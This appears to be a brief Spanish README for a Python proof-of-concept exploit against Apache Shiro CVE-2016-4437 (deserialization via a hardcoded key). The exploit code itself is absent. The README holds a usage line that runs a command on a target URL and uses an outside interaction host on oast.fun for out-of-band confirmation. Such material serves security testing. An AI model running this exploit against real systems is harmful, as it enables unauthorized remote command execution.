
Python POC para explotar la vulnerabilidad de deserialización de Apache Shiro CVE-2016-4437 debido a una clave de cifrado hardcodeada
POC en Python para explotar la vulnerabilidad de deserialización CVE-2016-4437 de Apache Shiro debido a una clave de cifrado codificada
Ejemplo de uso:
./CVE-2016-4437.py -c nslookup -u https://example.com/ -i ecsepnkqtxlishpynfdge01543e4vmx7v.oast.fun
Consulte los comentarios y el código para obtener más información.